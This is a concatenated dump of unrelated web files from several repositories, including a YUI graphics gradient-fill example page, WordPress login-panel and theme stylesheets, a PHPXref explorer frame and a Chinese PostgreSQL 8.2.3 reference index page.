DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<!-- =========== END OF NAVBAR =========== -->
<HR>
Copyright © 2005 Apache XML Project. All Rights Reserved.
</BODY>
</HTML>
|
navframe-js.html | mgsolipa/b2evolution_phpxref | <html>
<head>
<title>PHPXref Explorer</title>
<meta http-equiv="content-type" content="text/html;charset=iso-8859-1">
<link rel="stylesheet" href="sample.css" type="text/css">
</head>
<body bgcolor="#ffffff">
<!-- Generated by PHPXref 0.7.1 at Sat Nov 21 22:13:19 2015 -->
<!-- PHPXref (c) 2000-2010 Gareth Watts - gareth@omnipotent.net -->
<!-- http://phpxref.sourceforge.net/ -->
<div id="slist">
<p class="dirsubtitle">Explorer</p>
<script language="JavaScript" type="text/javascript" src="_jstree/tree.js"></script>
<script language="JavaScript" type="text/javascript" src="navframe-js.js"></script>
<script language="JavaScript" type="text/javascript" src="_jstree/tree_tpl.js"></script>
<script language="JavaScript" type="text/javascript">
root = new tree (TREE_ITEMS, tree_tpl);
</script>
</div>
</body>
</html>
|
sites/all/libraries/yui/docs/graphics/graphics-gradients.html | dkist/t-h-inker | <!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Example: Create Gradient Fills</title>
<link rel="stylesheet" href="http://fonts.googleapis.com/css?family=Maven+Pro:400,700">
<link rel="stylesheet" href="../../build/cssgrids/grids-min.css">
<link rel="stylesheet" href="../assets/css/main.css">
<link rel="stylesheet" href="../assets/vendor/prettify/prettify-min.css">
<script src="../../build/yui/yui-min.js"></script>
</head>
<body>
<div id="doc">
<h1>Example: Create Gradient Fills</h1>
<div class="yui3-g">
<div class="yui3-u-3-4">
<div id="main">
<div class="content"><style scoped>
#custom-doc { width: 95%; min-width: 950px; }
#pagetitle {background-image: url(../../assets/bg_hd.gif);}
#mygraphiccontainer {
position: relative;
width: 700px;
height:400px;
}
</style>
<div class="intro">
<p>
This example shows how to create gradient fills for a shape. By default, the <code>fill</code> attribute of a shape instance will generate a solid fill for the shape. Setting the <code>type</code> property on the <code>fill</code> attribute to <code>linear</code> or <code>radial</code> will create corresponding
gradient fill. Each gradient type has its own set of properties for defining the fill. Both share the <code>stop</code> property. The <code>stop</code> property defines the colors and their opacity and position in a
gradient fill. It is an array of objects containing the following information.
</p>
<dl>
<dt>color</dt><dd>The color of the stop.</dd>
<dt>opacity</dt><dd>Number between 0 and 1 that indicates the opacity of the stop. The default value is 1. Note: No effect for IE <= 8</dd>
<dt>offset</dt><dd>Number between 0 and 1 indicating where the color stop is positioned.</dd>
</dl>
<p>
Linear gradients included a rotation property which defines the direction of the gradient. (by default, linear gradients go left to right)
<dl>
<dt>rotation</dt><dd>Linear gradients flow left to right by default. The rotation property allows you to change the flow by rotation. (e.g. A rotation of 180 would make the gradient pain from right to left.)</dd>
</dl>
</p>
<p>
Radial gradients include the following additional properties:
<dl>
<dt>cx</dt><dd>The x-coordinate of the center of the gradient circle. Determines where the color stop begins. The default value 0.5.
<p><strong>Note: </strong>This property currently has no effect on Android or IE 6 - 8.</p>
</dd>
<dt>cy</dt><dd>The y-coordinate of the center of the gradient circle. Determines where the color stop begins. The default value 0.5.
<p><strong>Note: </strong>This property currently has no effect on Android or IE 6 - 8.</p>
</dd>
<dt>r</dt><dd>Radius of the gradient circle. Determines where the color stops end. The default value is 0.5.</dd>
<dt>fx</dt><dd>Focal point x-coordinate of the gradient.</dd>
<dt>fy</dt><dd>Focal point y-coordinate of the gradient.</dd>
</dl>
</p>
</div>
<div class="example">
<div id="mygraphiccontainer"></div>
<script>
YUI().use('graphics', function (Y)
{
var mygraphic = new Y.Graphic({render:"#mygraphiccontainer"});
var myrect = mygraphic.addShape({
type: "rect",
stroke: {
color:"#000",
weight: 1
},
fill: {
type: "linear",
rotation: 271,
stops: [
{color: "#ff6666", opacity: 1, offset: 0},
{color: "#00ffff", opacity: 1, offset: 0.5},
{color: "#000000", opacity: 1, offset: 1}
]
},
width:685,
height:400
});
var mycircle = mygraphic.addShape({
type: "circle",
radius: 50,
x: 0,
y: 0,
fill: {
type: "radial",
stops: [
{color: "#ff6666", offset: 0},
{color: "#00ffff", offset: 0.4},
{color: "#000000", offset: 0.7}
],
fx: 0.1,
fy: 0.3,
r: 0.5
},
stroke: {
color: "#000"
}
});
});
</script>
</div>
<h2>HTML</h2>
<pre class="code prettyprint"><div id="mygraphiccontainer"></div></pre>
<h2>CSS</h2>
<pre class="code prettyprint">#mygraphiccontainer {
position: relative;
width: 700px;
height:400px;
}</pre>
<h2>Javascript</h2>
<p>Add a rectangle with a linear gradient.</p>
<pre class="code prettyprint">var mygraphic = new Y.Graphic({render:"#mygraphiccontainer"});
var myrect = mygraphic.addShape({
type: "rect",
stroke: {
color:"#000",
weight: 1
},
fill: {
type: "linear",
rotation: 271,
stops: [
{color: "#ff6666", opacity: 1, offset: 0},
{color: "#00ffff", opacity: 1, offset: 0.5},
{color: "#000000", opacity: 1, offset: 1}
]
},
width:685,
height:400
});</pre>
<p>Add a circle with a radial gradient.</p>
<pre class="code prettyprint">var mycircle = mygraphic.addShape({
type: "circle",
radius: 50,
x: 0,
y: 0,
fill: {
type: "radial",
stops: [
{color: "#ff6666", offset: 0},
{color: "#00ffff", offset: 0.4},
{color: "#000000", offset: 0.7}
],
fx: 0.1,
fy: 0.3,
r: 0.5
},
stroke: {
color: "#000"
}
});</pre>
<h2>Complete Example Source</h2>
<pre class="code prettyprint"><div id="mygraphiccontainer"></div>
<script>
YUI().use('graphics', function (Y)
{
var mygraphic = new Y.Graphic({render:"#mygraphiccontainer"});
var myrect = mygraphic.addShape({
type: "rect",
stroke: {
color:"#000",
weight: 1
},
fill: {
type: "linear",
rotation: 271,
stops: [
{color: "#ff6666", opacity: 1, offset: 0},
{color: "#00ffff", opacity: 1, offset: 0.5},
{color: "#000000", opacity: 1, offset: 1}
]
},
width:685,
height:400
});
var mycircle = mygraphic.addShape({
type: "circle",
radius: 50,
x: 0,
y: 0,
fill: {
type: "radial",
stops: [
{color: "#ff6666", offset: 0},
{color: "#00ffff", offset: 0.4},
{color: "#000000", offset: 0.7}
],
fx: 0.1,
fy: 0.3,
r: 0.5
},
stroke: {
color: "#000"
}
});
});
</script></pre>
</div>
</div>
</div>
<div class="yui3-u-1-4">
<div class="sidebar">
<div class="sidebox">
<div class="hd">
<h2 class="no-toc">Examples</h2>
</div>
<div class="bd">
<ul class="examples">
<li data-description="Shows how to create a Graphic instance and add shapes.">
<a href="graphics-simple.html">Basic Graphics Implementation</a>
</li>
<li data-description="Shows how to draw lines and polygons.">
<a href="graphics-path.html">Basic Path</a>
</li>
<li data-description="Shows how to create linear and radial gradient fills.">
<a href="graphics-gradients.html">Create Gradient Fills</a>
</li>
<li data-description="Shows how to add drag to a shape.">
<a href="graphics-drag.html">Basic drag with graphic object</a>
</li>
<li data-description="Shows how to apply transforms to shape.">
<a href="graphics-transforms.html">Using Transforms</a>
</li>
<li data-description="Shows how to use a custom shape with the Graphics module.">
<a href="graphics-customshape.html">Custom Shape</a>
</li>
<li data-description="Shows to use the graphics api to draw a realistic glass.">
<a href="graphics-muddyglass.html">Transparent Glass with Shadow</a>
</li>
<li data-description="Shows to use the graphics api to draw a violin.">
<a href="graphics-violin.html">Complex Drawing: Violin</a>
</li>
</ul>
</div>
</div>
<div class="sidebox">
<div class="hd">
<h2 class="no-toc">Examples That Use This Component</h2>
</div>
<div class="bd">
<ul class="examples">
<li data-description="This example demonstrates animating an element along a curved path using bezier control points.">
<a href="../anim/curve.html">Animating Along a Curved Path</a>
</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</div>
<script src="../assets/vendor/prettify/prettify-min.js"></script>
<script>prettyPrint();</script>
</body>
</html>
|
wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_vertical.css | mandino/espressoshakespeare.com | /*
Name: Sliding Login Panel with mootools 1.2
Author: daiv mowbray
Author URI: http://wp-superslider.com/
Date: may 31, 2009
Version: 1.0
The CSS, XHTML and design is released under Creative Common License 3.0:
http://creativecommons.org/licenses/by-sa/3.0/
*/
/***** clearfix *****/
.clear {clear: both;height: 0;line-height: 0;}
.clearfix:after {content: ".";display: block;height: 0;clear: both;visibility: hidden;}
.clearfix{display: block;}
/* sliding panel */
#toppanel {
position: absolute; /*Panel will overlap content */
/*position: relative;*/ /*Panel will "push" the content down */
top: 0;
left: 0;
width: 100%;
z-index: 999;
margin: 0px auto;
}
#loginpanel {
display:none;
background: #fff url(images/panel_bg.png) repeat-x 0 0 ;
color: #999999;
width: 100%;
}
#loginpanel h1 {
font-size: 1.6em;
padding: 5px 0 10px;
color: #3875d7;
text-align: left;
}
#loginpanel h2{
font-size: 1.2em;
padding: 10px 0 5px;
color: #3875d7;
margin: 0;
}
.tab_corner, #panel_bottom{ display: none;}
#loginpanel a {
color: #15ADFF;
}
#loginpanel a:hover {
color: white;
}
.lost-pwd {
display: block;
float: left;
}
#loginpanel ul {
margin: 0 0 5px 0;
padding: 0;
line-height: 1.6em;
list-style: disc;
}
#loginpanel .content {
width: 960px;
margin: 0 auto;
padding-top: 15px;
text-align: left;
}
#loginpanel .second {
float: left;
margin-bottom: 10px;
padding: 0 15px;
border-right: 1px solid #3875d7;
min-height: 220px;
min-width: 100px;
max-width: 210px;
}
#loginpanel .first {
border-left: 1px solid #3875d7;
width: 280px;
}
#loginpanel .content label {
padding-top: 8px;
display: block;
}
#loginpanel .content input.field {
border: 2px #999 inset;
background: #e4e4e4;
margin: 4px 0px 0 0;
color: #333;
padding: 3px ;
}
#loginpanel .content input:focus.field {
background: #dfdfdf;
}
/* BUTTONS */
.bt_login, .bt_register {
cursor: pointer;
font-weight: bold;
padding: 2px 10px;
margin: 20px 0px;
background: transparent url(images/bt_back.jpg) repeat-x 0 0;
border: 1px outset gray;
}
.bt_login:hover, .bt_register:hover{
background-position: 0 -30px;
}
/* Panel Tab/button */
.logintab {
background: url(images/top_tab.png) repeat-x 0px -84px!important;
height: 36px;
position: relative;
top: -4px; /* make more or less visible the top bar */
z-index: 999;
}
.logintab ul.login {
display: block;
position: relative;
float: right;
clear: right;
height: 42px;
line-height: 42px;
margin: 0;
right: 10px;
color: white;
}
.login li {
background: url(images/top_tab.png) repeat-x 0px -54px!important;
background: url(images/top_tab.gif) repeat-x 0px -54px;
height: 40px;
padding: 0;
margin: 0;
display: block;
float: left;
}
.login li.ss_right {
background: url(images/top_tab.png) no-repeat right 0px!important;
background: url(images/top_tab.gif) no-repeat right 0px;
width: 16px;
}
.login li.ss_left {
background: url(images/top_tab.png) no-repeat left 0px!important;
background: url(images/top_tab.gif) no-repeat left 0px;
width: 16px;
}
.logintab a {
color: #15ADFF;
cursor: pointer;
margin: 0px 10px;
}
.logintab a:hover {
color: #3875d7;
}
.logintab .sep {color:#3875d7}
|
www.jinbuguo.com/postgresql/menu823/reference.html | Pengfei-Gao/develop-reference-data | <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="zh-CN"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta http-equiv="Content-Language" content="zh-CN"><link href="stylesheet.css" media="all" rel="stylesheet" type="text/css">
<title>参考手册</title>
<script>var _hmt=_hmt||[]; (function(){ var hm=document.createElement("script"); hm.src="//hm.baidu.com/hm.js?d286c55b63a3c54a1e43d10d4c203e75"; var s=document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm,s); })();</script>
</head><body class="PART">
<div>
<table summary="Header navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><th colspan="5" align="center" valign="bottom">PostgreSQL 8.2.3 中文文档</th></tr>
<tr><td width="10%" align="left" valign="top"><a href="spi-examples.html" accesskey="P">后退</a></td><td width="10%" align="left" valign="top"><a href="server-programming.html">快退</a></td><td width="60%" align="center" valign="bottom"></td><td width="10%" align="right" valign="top"><a href="internals.html">快进</a></td><td width="10%" align="right" valign="top"><a href="sql-commands.html" accesskey="N">前进</a></td></tr>
</table>
<hr align="LEFT" width="100%"></div>
<div class="PART"><a name="REFERENCE"></a>
<div><h1>VI. 参考手册</h1>
<div class="PARTINTRO"><a name="AEN43559"></a>
<p>这份参考里的条目给各个相关对象提供了权威、完整、正式的概要。有关使用 PostgreSQL 的更多信息(叙述、教程、例子),可以在 PostgreSQL 文档集的其它部分找到。参阅在每个参考页里的交叉引用。</p>
<p>参考手册里的条目也可以在传统的"man"页里获得。</p>
</div>
<div>
<dl>
<dt><b>目录</b></dt>
<dt>I. <a href="sql-commands.html">SQL 命令</a></dt>
<dd><dl>
<dt><a href="sql-abort.html">ABORT</a> -- 退出当前事务</dt>
<dt><a href="sql-alteraggregate.html">ALTER AGGREGATE</a> -- 修改一个聚集函数的定义</dt>
<dt><a href="sql-alterconversion.html">ALTER CONVERSION</a> -- 修改一个编码转换的定义</dt>
<dt><a href="sql-alterdatabase.html">ALTER DATABASE</a> -- 修改一个数据库</dt>
<dt><a href="sql-alterdomain.html">ALTER DOMAIN</a> -- 修改一个域的定义</dt>
<dt><a href="sql-alterfunction.html">ALTER FUNCTION</a> -- 修改一个函数的定义</dt>
<dt><a href="sql-altergroup.html">ALTER GROUP</a> -- 修改角色名或者成员关系</dt>
<dt><a href="sql-alterindex.html">ALTER INDEX</a> -- 改变一个索引的定义</dt>
<dt><a href="sql-alterlanguage.html">ALTER LANGUAGE</a> -- 修改一个过程语言的定义</dt>
<dt><a href="sql-alteroperator.html">ALTER OPERATOR</a> -- 修改一个操作符的定义</dt>
<dt><a href="sql-alteropclass.html">ALTER OPERATOR CLASS</a> -- 修改一个操作符类的定义</dt>
<dt><a href="sql-alterrole.html">ALTER ROLE</a> -- 修改一个数据库角色</dt>
<dt><a href="sql-alterschema.html">ALTER SCHEMA</a> -- 修改一个模式的定义</dt>
<dt><a href="sql-altersequence.html">ALTER SEQUENCE</a> -- 修改一个序列生成器的定义</dt>
<dt><a href="sql-altertable.html">ALTER TABLE</a> -- 修改表的定义</dt>
<dt><a href="sql-altertablespace.html">ALTER TABLESPACE</a> -- 修改一个表空间的定义</dt>
<dt><a href="sql-altertrigger.html">ALTER TRIGGER</a> -- 修改一个触发器的定义</dt>
<dt><a href="sql-altertype.html">ALTER TYPE</a> -- 修改一个类型的定义</dt>
<dt><a href="sql-alteruser.html">ALTER USER</a> -- 修改一个数据库角色</dt>
<dt><a href="sql-analyze.html">ANALYZE</a> -- 收集与数据库有关的统计信息</dt>
<dt><a href="sql-begin.html">BEGIN</a> -- 开始一个事务块</dt>
<dt><a href="sql-checkpoint.html">CHECKPOINT</a> -- 强制一个事务日志检查点</dt>
<dt><a href="sql-close.html">CLOSE</a> -- 关闭一个游标</dt>
<dt><a href="sql-cluster.html">CLUSTER</a> -- 根据一个索引对某个表群集</dt>
<dt><a href="sql-comment.html">COMMENT</a> -- 定义或者改变一个对象的评注</dt>
<dt><a href="sql-commit.html">COMMIT</a> -- 提交当前事务</dt>
<dt><a href="sql-commit-prepared.html">COMMIT PREPARED</a> -- 提交一个早先为两阶段提交准备好的事务</dt>
<dt><a href="sql-copy.html">COPY</a> -- 在表和文件之间拷贝数据</dt>
<dt><a href="sql-createaggregate.html">CREATE AGGREGATE</a> -- 定义一个新的聚集函数</dt>
<dt><a href="sql-createcast.html">CREATE CAST</a> -- 定义一个用户定义的转换</dt>
<dt><a href="sql-createconstraint.html">CREATE CONSTRAINT TRIGGER</a> -- 定义一个新的约束触发器</dt>
<dt><a href="sql-createconversion.html">CREATE CONVERSION</a> -- 定义一个新的的编码转换</dt>
<dt><a href="sql-createdatabase.html">CREATE DATABASE</a> -- 创建一个新数据库</dt>
<dt><a href="sql-createdomain.html">CREATE DOMAIN</a> -- 定义一个新域</dt>
<dt><a href="sql-createfunction.html">CREATE FUNCTION</a> -- 定义一个新函数</dt>
<dt><a href="sql-creategroup.html">CREATE GROUP</a> -- 定义一个新数据库角色</dt>
<dt><a href="sql-createindex.html">CREATE INDEX</a> -- 定义一个新索引</dt>
<dt><a href="sql-createlanguage.html">CREATE LANGUAGE</a> -- 定义一种新过程语言</dt>
<dt><a href="sql-createoperator.html">CREATE OPERATOR</a> -- 定义一个新操作符</dt>
<dt><a href="sql-createopclass.html">CREATE OPERATOR CLASS</a> -- 定义一个新操作符类</dt>
<dt><a href="sql-createrole.html">CREATE ROLE</a> -- 定义一个新数据库角色</dt>
<dt><a href="sql-createrule.html">CREATE RULE</a> -- 定义一个新重写规则</dt>
<dt><a href="sql-createschema.html">CREATE SCHEMA</a> -- 定义一个新模式</dt>
<dt><a href="sql-createsequence.html">CREATE SEQUENCE</a> -- 定义一个新序列发生器</dt>
<dt><a href="sql-createtable.html">CREATE TABLE</a> -- 定义一个新表</dt>
<dt><a href="sql-createtableas.html">CREATE TABLE AS</a> -- 从一条查询的结果中定义一个新表</dt>
<dt><a href="sql-createtablespace.html">CREATE TABLESPACE</a> -- 定义一个新表空间</dt>
<dt><a href="sql-createtrigger.html">CREATE TRIGGER</a> -- 定义一个新触发器</dt>
<dt><a href="sql-createtype.html">CREATE TYPE</a> -- 定义一个新数据类型</dt>
<dt><a href="sql-createuser.html">CREATE USER</a> -- 定义一个新数据库角色</dt>
<dt><a href="sql-createview.html">CREATE VIEW</a> -- 定义一个新视图</dt>
<dt><a href="sql-deallocate.html">DEALLOCATE</a> -- 删除一个预备语句</dt>
<dt><a href="sql-declare.html">DECLARE</a> -- 定义一个游标</dt>
<dt><a href="sql-delete.html">DELETE</a> -- 删除一个表中的行</dt>
<dt><a href="sql-dropaggregate.html">DROP AGGREGATE</a> -- 删除一个聚集函数</dt>
<dt><a href="sql-dropcast.html">DROP CAST</a> -- 删除一个类型转换</dt>
<dt><a href="sql-dropconversion.html">DROP CONVERSION</a> -- 删除一个编码转换</dt>
<dt><a href="sql-dropdatabase.html">DROP DATABASE</a> -- 删除一个数据库</dt>
<dt><a href="sql-dropdomain.html">DROP DOMAIN</a> -- 删除一个域</dt>
<dt><a href="sql-dropfunction.html">DROP FUNCTION</a> -- 删除一个函数</dt>
<dt><a href="sql-dropgroup.html">DROP GROUP</a> -- 删除一个数据库角色</dt>
<dt><a href="sql-dropindex.html">DROP INDEX</a> -- 删除一个索引</dt>
<dt><a href="sql-droplanguage.html">DROP LANGUAGE</a> -- 删除一个过程语言</dt>
<dt><a href="sql-dropoperator.html">DROP OPERATOR</a> -- 删除一个操作符</dt>
<dt><a href="sql-dropopclass.html">DROP OPERATOR CLASS</a> -- 删除一个操作符类</dt>
<dt><a href="sql-drop-owned.html">DROP OWNED</a> -- 删除一个数据库角色所拥有的数据库对象</dt>
<dt><a href="sql-droprole.html">DROP ROLE</a> -- 删除一个数据库角色</dt>
<dt><a href="sql-droprule.html">DROP RULE</a> -- 删除一个重写规则</dt>
<dt><a href="sql-dropschema.html">DROP SCHEMA</a> -- 删除一个模式</dt>
<dt><a href="sql-dropsequence.html">DROP SEQUENCE</a> -- 删除一个序列</dt>
<dt><a href="sql-droptable.html">DROP TABLE</a> -- 删除一个表</dt>
<dt><a href="sql-droptablespace.html">DROP TABLESPACE</a> -- 删除一个表空间</dt>
<dt><a href="sql-droptrigger.html">DROP TRIGGER</a> -- 删除一个触发器</dt>
<dt><a href="sql-droptype.html">DROP TYPE</a> -- 删除一个数据类型</dt>
<dt><a href="sql-dropuser.html">DROP USER</a> -- 删除一个数据库角色</dt>
<dt><a href="sql-dropview.html">DROP VIEW</a> -- 删除一个视图</dt>
<dt><a href="sql-end.html">END</a> -- 提交当前事务</dt>
<dt><a href="sql-execute.html">EXECUTE</a> -- 执行一个预备语句</dt>
<dt><a href="sql-explain.html">EXPLAIN</a> -- 显示一个语句的执行规划</dt>
<dt><a href="sql-fetch.html">FETCH</a> -- 用游标从查询中抓取行</dt>
<dt><a href="sql-grant.html">GRANT</a> -- 赋予访问权限</dt>
<dt><a href="sql-insert.html">INSERT</a> -- 在表中创建新行</dt>
<dt><a href="sql-listen.html">LISTEN</a> -- 监听一个通知</dt>
<dt><a href="sql-load.html">LOAD</a> -- 加载或重新加载一个共享库文件</dt>
<dt><a href="sql-lock.html">LOCK</a> -- 锁定一个表</dt>
<dt><a href="sql-move.html">MOVE</a> -- 定位一个游标</dt>
<dt><a href="sql-notify.html">NOTIFY</a> -- 生成一个通知</dt>
<dt><a href="sql-prepare.html">PREPARE</a> -- 创建一个预备语句</dt>
<dt><a href="sql-prepare-transaction.html">PREPARE TRANSACTION</a> -- 为当前事务做两阶段提交的准备</dt>
<dt><a href="sql-reassign-owned.html">REASSIGN OWNED</a> -- 修改数据库对象的属主</dt>
<dt><a href="sql-reindex.html">REINDEX</a> -- 重建索引</dt>
<dt><a href="sql-release-savepoint.html">RELEASE SAVEPOINT</a> -- 删除一个先前定义的保存点</dt>
<dt><a href="sql-reset.html">RESET</a> -- 把一个运行时参数重置为缺省值</dt>
<dt><a href="sql-revoke.html">REVOKE</a> -- 删除访问权限</dt>
<dt><a href="sql-rollback.html">ROLLBACK</a> -- 退出当前事务</dt>
<dt><a href="sql-rollback-prepared.html">ROLLBACK PREPARED</a> -- 取消一个先前为两阶段提交准备好的事务</dt>
<dt><a href="sql-rollback-to.html">ROLLBACK TO SAVEPOINT</a> -- 回滚到一个保存点</dt>
<dt><a href="sql-savepoint.html">SAVEPOINT</a> -- 在当前事务里定义一个新保存点</dt>
<dt><a href="sql-select.html">SELECT</a> -- 从表或视图中取出若干行</dt>
<dt><a href="sql-selectinto.html">SELECT INTO</a> -- 从一条查询的结果中定义一个新表</dt>
<dt><a href="sql-set.html">SET</a> -- 修改运行时参数</dt>
<dt><a href="sql-set-constraints.html">SET CONSTRAINTS</a> -- 设置当前事务的约束检查模式</dt>
<dt><a href="sql-set-role.html">SET ROLE</a> -- 设置当前会话的当前用户标识符</dt>
<dt><a href="sql-set-session-authorization.html">SET SESSION AUTHORIZATION</a> -- 为当前会话设置会话用户标识符和当前用户标识符</dt>
<dt><a href="sql-set-transaction.html">SET TRANSACTION</a> -- 设置当前事务的特性</dt>
<dt><a href="sql-show.html">SHOW</a> -- 显示运行时参数的值</dt>
<dt><a href="sql-start-transaction.html">START TRANSACTION</a> -- 开始一个事务块</dt>
<dt><a href="sql-truncate.html">TRUNCATE</a> -- 清空一个或一组表</dt>
<dt><a href="sql-unlisten.html">UNLISTEN</a> -- 停止监听通知信息</dt>
<dt><a href="sql-update.html">UPDATE</a> -- 更新一个表中的行</dt>
<dt><a href="sql-vacuum.html">VACUUM</a> -- 垃圾收集以及可选地分析一个数据库</dt>
<dt><a href="sql-values.html">VALUES</a> -- 计算一个或一组行</dt>
</dl></dd>
<dt>II. <a href="reference-client.html">PostgreSQL 客户端应用程序</a></dt>
<dd><dl>
<dt><a href="app-clusterdb.html"><span class="APPLICATION">clusterdb</span></a> -- 群集一个数据库</dt>
<dt><a href="app-createdb.html"><span class="APPLICATION">createdb</span></a> -- 创建一个新数据库</dt>
<dt><a href="app-createlang.html"><span class="APPLICATION">createlang</span></a> -- 定义一个新过程语言</dt>
<dt><a href="app-createuser.html"><span class="APPLICATION">createuser</span></a> -- 定义一个新用户帐户</dt>
<dt><a href="app-dropdb.html"><span class="APPLICATION">dropdb</span></a> -- 删除一个数据库</dt>
<dt><a href="app-droplang.html"><span class="APPLICATION">droplang</span></a> -- 删除一个过程语言</dt>
<dt><a href="app-dropuser.html"><span class="APPLICATION">dropuser</span></a> -- 删除一个用户帐户</dt>
<dt><a href="app-ecpg.html"><span class="APPLICATION">ecpg</span></a> -- 嵌入的 SQL C 预处理器</dt>
<dt><a href="app-pgconfig.html">pg_config</a> -- 检索已安装的 PostgreSQL 版本信息</dt>
<dt><a href="app-pgdump.html">pg_dump</a> -- 将一个数据库转储到一个脚本文件或者其它归档文件中</dt>
<dt><a href="app-pg-dumpall.html"><span class="APPLICATION">pg_dumpall</span></a> -- 将一个数据库集群转储到一个脚本文件中</dt>
<dt><a href="app-pgrestore.html">pg_restore</a> -- 从 pg_dump 创建的备份文件中恢复数据库</dt>
<dt><a href="app-psql.html"><span class="APPLICATION">psql</span></a> -- PostgreSQL 交互终端</dt>
<dt><a href="app-reindexdb.html"><span class="APPLICATION">reindexdb</span></a> -- 重建数据库索引</dt>
<dt><a href="app-vacuumdb.html"><span class="APPLICATION">vacuumdb</span></a> -- 收集垃圾并分析一个数据库</dt>
</dl></dd>
<dt>III. <a href="reference-server.html">PostgreSQL 服务器应用程序</a></dt>
<dd><dl>
<dt><a href="app-initdb.html">initdb</a> -- 创建一个新数据库集群</dt>
<dt><a href="app-ipcclean.html"><span class="APPLICATION">ipcclean</span></a> -- 从失效的 PostgreSQL 服务器中删除共享内存和信号灯</dt>
<dt><a href="app-pgcontroldata.html"><span class="APPLICATION">pg_controldata</span></a> -- 显示一个集群的控制信息</dt>
<dt><a href="app-pg-ctl.html"><span class="APPLICATION">pg_ctl</span></a> -- 启动、停止、重启 PostgreSQL</dt>
<dt><a href="app-pgresetxlog.html"><span class="APPLICATION">pg_resetxlog</span></a> -- 重置一个数据库集群的预写日志以及其它控制内容</dt>
<dt><a href="app-postgres.html"><span class="APPLICATION">postgres</span></a> -- PostgreSQL 数据库服务器</dt>
<dt><a href="app-postmaster.html"><span class="APPLICATION">postmaster</span></a> -- PostgreSQL 数据库服务器</dt>
</dl></dd>
</dl>
</div>
</div>
</div>
<div>
<hr align="LEFT" width="100%">
<table summary="Footer navigation table" width="100%" border="0" cellpadding="0" cellspacing="0">
<tr><td width="33%" align="left" valign="top"><a href="spi-examples.html" accesskey="P">后退</a></td><td width="34%" align="center" valign="top"><a href="index.html" accesskey="H">首页</a></td><td width="33%" align="right" valign="top"><a href="sql-commands.html" accesskey="N">前进</a></td></tr>
<tr><td width="33%" align="left" valign="top">Examples</td><td width="34%" align="center" valign="top"> </td><td width="33%" align="right" valign="top">SQL 命令</td></tr>
</table>
</div>
</body></html> |
wp-content/themes/storefront/css/style.css | CannedHead/feelingsurf | @charset "utf-8";
@import url(https://fonts.googleapis.com/css?family=Montserrat);
@font-face {
font-family: 'bebas_neue_regularregular';
src: url('../fonts/bebasneue_regular-webfont.eot');
src: url('../fonts/bebasneue_regular-webfont.eot?#iefix') format('embedded-opentype'),
url('../fonts/bebasneue_regular-webfont.woff2') format('woff2'),
url('../fonts/bebasneue_regular-webfont.woff') format('woff'),
url('../fonts/bebasneue_regular-webfont.ttf') format('truetype'),
url('../fonts/bebasneue_regular-webfont.svg#bebas_neue_regularregular') format('svg');
font-weight: normal;
font-style: normal;
}
/* CSS Document */
html{
height:100%;
}
body {
overflow-y:scroll;
overflow-x:hidden;
height:100%;
}
h1,h2,h3,h4,h5,h6{
font-family: 'bebas_neue_regularregular';
}
.img-responsive{
width:100%;
}
.no-padding {
padding: 0 !important;
}
.no-height{
min-height: 0px;
}
/*
██╗ ██╗███████╗ █████╗ ██████╗ ███████╗██████╗
██║ ██║██╔════╝██╔══██╗██╔══██╗██╔════╝██╔══██╗
███████║█████╗ ███████║██║ ██║█████╗ ██████╔╝
██╔══██║██╔══╝ ██╔══██║██║ ██║██╔══╝ ██╔══██╗
██║ ██║███████╗██║ ██║██████╔╝███████╗██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝
*/
.banner-principal{
background: url(https://s3-sa-east-1.amazonaws.com/feelingsurf/banner-superior.png) no-repeat;
height: 19vw;
background-size: 100% auto;
overflow:hidden;
}
.site-footer{
background-color:#fff !important;
}
.logo-principal{
padding: 2%;
}
.facebook-principal{
position: absolute;
top: 10px;
right: 70px;
width: 24px;
}
.instagram-principal{
position: absolute;
top: 10px;
right: 40px;
width: 24px;
}
.triangle-up-left{
position: absolute;
left:0;
bottom:0;
width: 18%;
height: 100%;
background: linear-gradient(to right top, rgba(0,0,0,0.4) 50%, transparent 50%);
}
.triangle-up-right{
position: absolute;
right:0;
bottom:0;
width: 18%;
height: 100%;
background: linear-gradient(to left top, rgba(0,0,0,0.4) 50%, transparent 50%);
}
.triangle-down-left{
position: absolute;
left:0;
top:0;
width: 18%;
height: 60%;
background: linear-gradient(to right bottom, rgba(0,0,0,0.4) 50%, transparent 50%);
z-index:10;
}
.triangle-down-right{
position: absolute;
right:0;
top:0;
width: 18%;
height: 60%;
background: linear-gradient(to left bottom, rgba(0,0,0,0.4) 50%, transparent 50%);
z-index:10;
}
.carousel-control{
z-index: 20;
}
/* Customize the navbar links to be fill the entire space of the .navbar */
.navbar .navbar-inner {
padding: 0;
}
.navbar{
-webkit-border-radius: 0px;
-moz-border-radius: 0px;
border-radius: 0px;
}
.navbar-collapse{
padding-left: 0;
padding-right: 0;
}
#navbar-main .navbar-logo{
display:none;
}
#navbar-main.navbar-fixed-top .navbar-logo{
display:none;
width: 80px;
position: absolute;
left: 50%;
background-color: rgb(42, 42, 42);
margin-left: -40px;
top: 0px;
padding: 9px;
z-index: 2;
}
.floating-cart{
position: relative;
top:-1px;
right: -1px;
background-color: #333;
}
.site-header-cart{
margin-bottom: 3px;
}
.site-header-cart .cart-contents{
padding-top:5px;
}
.navbar .nav {
margin: 0;
display: table;
width: 100%;
}
.navbar .nav li {
display: table-cell;
width: 20%;
float: none;
}
#navbar-main.navbar-fixed-top{
}
.navbar .nav li a {
font-weight: bold;
text-align: center;
border-left: 1px solid rgba(255, 255, 255, .75);
border-right: 1px solid rgba(0, 0, 0, .1);
font-size: 0.9em;
line-height: 0px;
padding-top: 24px;
padding-bottom: 24px;
}
.navbar .nav li:first-child a {
border-left: 0;
border-radius: 3px 0 0 3px;
}
.navbar .nav li:last-child a {
border-right: 0;
border-radius: 0 3px 3px 0;
}
.banner-nav{
z-index: 999;
}
.banner-2{
margin-top: -50px;
}
.carousel-caption h3{
